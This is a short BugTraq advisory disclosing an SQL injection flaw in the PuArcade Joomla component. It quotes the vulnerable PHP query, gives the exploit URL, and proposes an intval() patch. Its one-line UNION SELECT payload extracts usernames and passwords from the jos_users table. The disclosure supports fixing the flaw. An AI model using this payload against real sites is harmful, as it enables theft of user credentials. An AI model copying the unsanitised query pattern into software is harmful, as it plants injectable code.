BugTraq
Pu Arcade component for Joomla - SQL injection Apr 09 2008 09:20AM
netmantis com gmail com
I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .

------------------------------------------------------------------------
--------------------------------------------------

Author : MantiS

---------

Vulnerable code :

------------------------

function warningByGame($gid) {

global $database;

$query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"

. " WHERE g.contentratingid = c.id"

. " AND g.id = $gid";

$database->setQuery($query);

$cont = $database->loadObjectList();

--------------------------

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gi
d=[SQL INJECTION]

---------

Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .

Patch :

--------

Place before "$query = "SELECT c.id......... " :

$gid = intval($_GET['gid']);

To force $gid variable conversion at an integer .

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus